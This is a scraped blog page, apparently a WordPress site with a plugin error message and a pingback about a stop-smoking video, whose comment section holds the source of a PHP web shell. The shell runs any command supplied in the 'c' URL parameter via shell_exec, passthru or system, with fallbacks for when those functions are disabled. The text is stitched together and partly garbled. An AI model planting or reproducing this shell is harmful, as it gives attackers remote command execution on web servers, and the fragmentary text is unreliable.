Warning: copy() [function.copy]: Filename cannot be empty in /homepages/31/d88071968/htdocs/tipstoread/wp-content/plugins/mytube/mytube.php on line 220
//Umm basicly just makes it easier so i don’t have to type…
//$_GET[’m'] = ‘1′… $_GET[’m'] = ‘2′ with if statements.
//Instead just use case”1″ case”2″ etc.
switch($_GET[’m']) {
//If shell.php?m=1 then execute what ever command is under c=
//E.G. shell.php?m=1&c=ls -la
April 5th, 2008 at 9:49 am
[…] Tips To Read wrote an interesting post today on Stop Smoking VideoHere’s a quick excerpt […]
April 7th, 2008 at 10:51 pm
“;
//Love tags organize the shit greatly.
echo”";
//Umm basicly just makes it easier so i don’t have to type…
//$_GET[’m'] = ‘1′… $_GET[’m'] = ‘2′ with if statements.
//Instead just use case”1″ case”2″ etc.
switch($_GET[’m']) {
//If shell.php?m=1 then execute what ever command is under c=
//E.G. shell.php?m=1&c=ls -la
case”1″:
$cmd = shell_exec($_GET[’c']);
echo”$cmd”;
break;
//Same as above but with passthru incase shell_exec() is dissalowed
in…
//The php.ini
case”2″:
$cmd = passthru($_GET[’c']);
echo”$cmd”;
break;
//Same as both above but incase shell_exec() & passthru() are
disabled…
// In php.ini
case”3″:
$cmd = system($_GET[’c']);
echo”$cmd”;
break;
//END SWITCH
}
//End tags
echo”";
//End File
?>